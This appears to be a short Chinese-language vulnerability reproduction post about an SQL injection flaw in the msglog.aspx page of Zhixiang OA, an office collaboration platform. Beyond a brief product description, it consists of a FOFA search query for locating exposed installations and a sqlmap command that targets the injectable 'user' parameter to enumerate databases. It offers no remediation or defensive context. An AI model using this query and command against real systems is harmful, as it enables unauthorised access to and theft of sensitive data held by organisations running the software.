0%

【漏洞复现】致翔OA msglog.aspx SQL注入漏洞

【漏洞复现】致翔OA msglog.aspx SQL注入漏洞

致翔OA是集成多个行业应用功能的OA协同办公平台,其核心机制是创新与合作,秉承开放的精神,可以提供嵌入式的OA系统开发支持。致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。

fofa语法

fofa:app="致翔软件-致翔OA"

注入点

python sqlmap.py -u http://{{Hostname}}/mainpage/msglog.aspx?user=1 --dbs

image-20230308194937667